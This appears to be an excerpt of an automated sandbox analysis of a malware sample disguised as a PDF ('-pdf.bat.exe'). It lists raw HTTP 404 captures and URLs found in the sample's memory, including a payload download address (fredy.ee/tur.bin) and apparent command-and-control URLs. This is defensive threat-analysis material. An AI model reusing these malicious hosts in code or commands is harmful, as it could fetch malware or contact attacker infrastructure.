        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:17 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:20 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 33 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6d 6f db d6 15 fe 9e 5f 71 a3 01 96 94 88 64 9c b4 43 12 4b 72 d3 a4 db 97 b4 1d e0 74 c3 e0 a6 c2 15 75 2d b1 a2 48 8d a4 ec a8 49 80 36 e9 2b 1a 34 68 57 60 43 b1 f7 61 d8 a7 01 89 13 af 6e 5e 9c bf 40 fe a3 3d e7 5c 92 a2 64 c9 71 d2 b4 ab 01 db d2 7d 3d f7 9c e7 3c e7 dc 97 fa d1 8e 6f 47 e3 a1 12 bd 68 e0 36 eb f4 57 d8 ae 0c c3 46 c9 09 5b b2 23 87 91 b3 a9 4a c2 95 5e b7 51 0a 46 25 b4 51 b2 d3 ac 0f 54 24 85 dd 93 41 a8 a2 46 e9 ad 4b bf 30 4e a3 8e 4b 3d 39 50 8d d2 50 06 7d c7 eb 96 84 ed 7b 91 f2 d0 28 50 dd 60 64 04 18 73 ba e5 a6 a3 b6 86 7e 10 15 9a 6e 39 9d a8 d7 e8 a8 4d c7 56 06 7f a9 39 9e 13 39 d2 35 42 5b ba aa b1 8c 21 22 27 72 55 73 6b 6b cb 94 6e 5b 05 be d1 d9 54 81 63 fa 9e eb 78 aa 6e e9 ea 3a be f4 45 a0 dc 46 29 8c c6 ae 0a 7b 4a 61 a6 81 ea 38 b2 51 92 ae 5b 12 bd 40 6d e4 f2 b2 7c 86 1c 45 be 69 87 21 66 99 f4 77 b0 92 ac f5 86 84 68 be 67 e2 cf ea 72 49 90 0a a1 b1 81 ec 2a eb 8a c1 0d 9b f5 d0 0e 9c 61 d4 b4 8e d5 8f ae 9f bf 70 ee d2 b9 f5 63 d6 91 2d c7 eb f8 5b 66 14 48 bb bf c6 0d 2e fa b2 23 1a 62 63 e4 d9 91 e3 7b 95 ea d5 eb 2b 47 ac 63 97 2f 37 8f 59 75 2b 1d 24 1d 4c 60 71 68 de 28 cd 1f a6 52 b6 06 d2 73 36 54 18 99 ef 86 e5 6a 09 ed 55 10 f8 c1 21 3b d4 c4 32 fa 84 81 dd 28 15 07 82 61 32 43 8f a2 0d 36 f4 33 cb 45 a8 81 ed 48 23 e1 a1 65 9b ed 54 94 6f a6 ee 20 19 2d 0d d9 b6 df 19 67 e0 6e 1b 43 d8 4a e8 7f 2d 32 5f 2b 05 2c 97 31 74 27 9f 5a ed 6e cb 75 ba bd 08 78 a0 b1 54 50 1c 87 1b b7 5a 69 05 0d 39 55 a2 47 4f 61 df 71 36 17 76 35 3c 3f 22 91 22 75 05 13 c5 5f c7 7b f1 a3 78 27 7e 2c e2 6f e3 3b c9 fb f8 78 2f de 4d 3e 48 6e e0 f3 2e 7e f7 e2 ed f8 0e 55 6f 2f 79 ed 70 b8 52 87 43 6a d7 6d 1b 84 da 0c ab bd 28 1a 86 67 2d 0b fe 67 c2 83 b5 33 78 fe 86 ef ba fe 96 f0 7c 7f a8 80 12 7c 80 1f 00 2d 2a 00 9e 65 d0 25 bf 6e b5 e1 f8 7d 08 f3 37 9a dd 4c de 4f 6e d6 2d d9 ac 5b 58 47 b3 3e b3 98 ae 6a b5 52 67 37 b6 02 39 1c 62 d0 54 c1 b3 e5 2d f6 c5 16 7c 01 cc b0 b0 11 9b a5 e7 87 11 78 c4 08 23 19 39 36 0c 30 33 eb 94 ae 8d 74 7e b2 d3 f2 44 1b 33 16 31 98 1a 4a 8b a9 a3 b7 dc ac 0f 17 77 ef 28 0d 64 78 eb b3 9b ab de 0e 9a f1 ae b6 58 fc 84 4c 19 3f 61 f3 3e d8 67 d0 29 ad 0f 17 ad bc 3d 8a 22 df 0b 33 95 63 e9 05 1c e8 4a 48 a9 3f c0 0e ae 1f b4 d8 d0 ca b3 09 6d 69 45 e8 bc a7 5a 80 c0 40 ba 6c 8f 54 ad 79 ff 5c 85 69 7b b6 0d 98 b9 30 c4 50 76 3a b0 54 cb 25 f0 cc 82 8f 68 5a 03 d0 da ea f9 4e 68 ad da 3d 65 f7 1b 4b 1d 0e 17 0b 58 7c 49 0e 86 2b e8 d6 0a fd 51 60 ab 46 26 05 f1 73 a9 f9 1b 1a 88 f0 28 8a 4b 26 f7 29 2e 81 09 bc e0 95 07 2f a9 e3 0f a4 93 d3 7c e6 3a 05 e9 75 03 cb 53 5b d6 ea 28 1a 64 92 2d 5a 00 35 a1 60 33 1a 64 c2 2f 51 91 8d 85 49 a7 eb 35 42 a8 cb eb b4 30 dc c1 6b 8d ff 01 78 fc 37 de 11 c9 47 f1 5e f2 49 72 53 c4 f7 33 82 38 5a f0 c9 70 28 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 39 38 61 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 61 6c 62 65 72 6f 2d 64 76 65 72 69 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:28 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:31 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:34 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 04 Oct 2024 06:12:36 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66b1b463-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 06:12:55 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 06:12:58 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 04 Oct 2024 06:13:00 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 389X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38152409772.00000000319C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://fredy.ee/tur.bin
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fredy.ee/tur.binE
        Source: -pdf.bat.exe, 00000002.00000002.38142502019.0000000002478000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fredy.ee/tur.bint
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: -pdf.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42758358697.000000000560C000.00000004.80000000.00040000.00000000.sdmp, ipconfig.exe, 00000004.00000002.42208297039.00000000058CC000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://tempatmudisini01.click/iydt/?oz=Devrpt6CKIMDtnVDPR2S8x3yMYRId44n2aQLSTimhEZ/Y4z
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753648495.000000000107A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dorikis.online
        Source: ijDRAEBvXKu.exe, 00000003.00000002.42753648495.000000000107A000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dorikis.online/d84b/
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000649000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: -pdf.bat.exe, 00000002.00000001.37862054479.0000000000626000.00000020.00000001.01000000.00000006.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: -pdf.bat.exe, 00000002.00000003.37949059523.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052193436.00000000024EB000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000002.38142823991.00000000024F8000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051869790.00000000024EF000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38051946854.00000000024F5000.00000004.00000020.00020000.00000000.sdmp, -pdf.bat.exe, 00000002.00000003.38052276649.00000000024F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
